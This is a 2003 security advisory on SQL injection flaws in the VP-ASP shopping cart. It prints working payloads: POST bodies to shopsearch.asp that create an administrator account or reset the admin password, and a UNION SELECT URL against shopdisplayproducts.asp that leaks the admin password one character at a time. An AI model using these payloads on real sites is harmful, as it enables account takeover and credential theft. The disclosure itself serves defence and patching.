|
|
|
|
| |
Virtual Programming VP-ASP is "a shopping cart application for e-commerce enabled sites. It is written in ASP, supports the following databases: Access, MSSQL, MySQL on Windows and MySQL on UNIX".
VP-ASP suffers from SQL injection vulnerabilities, which may allow an attacker in some cases to gain administrative access to the installed VP-ASP Shopping Cart software or execute arbitrary commands on a target's system. |
| |
Credit:
The original advisory is available from: http://www.s-quadra.com/advisories/Adv-20031128.txt.
The information has been provided by Nick Gudov.
|
| |
Vulnerability 1: SQL Injection Vulnerability in 'shopsearch.asp' Script
An SQL Injection vulnerability has been found in the shopsearch.asp script. User supplied input is not filtered before being used in a SQL query. Consequently, query modification using malformed input is possible. Exploitation of the vulnerability allows a remote attacker to insert a new user with administrative privileges. A more sophisticated exploitation would allow a remote attacker to execute arbitrary commands on a target's system (via MSSQL xp_cmdshell() function for example).
Exploit:
Platform: Win32/MSSQL
Posting this data to shopsearch.asp creates new administrative account:
Keyword=&category=5); insert into tbluser (fldusername) values ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Posting this data to shopsearch.asp changes admin password
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Vulnerability 2: SQL Injection Vulnerability in 'shopdisplayproducts.asp' Script
An SQL Injection vulnerability has been found in the shopdisplayproducts.asp script. Exploitation of the vulnerability will allow remote attacker to read any information from a database.
Exploit:
Platform: Win32/MSSQL
http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty' union%20select fldauto,fldpassword%20from%20tbluser%20where fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
Changing value at the end of request
%20'a%25'--
%20'b%25'--
%20'c%25'--
...
And looking through the HTTP response from VP-ASP web server attacker can find the administrator password.
Solution:
S-Quadra alerted VP-ASP development team to this issue on 28th November 2003. Security fixes from VP-ASP development team available at: http://www.vpasp.com/virtprog/info/faq_securityfixes.htm.
|
|
|
|
|
|
|
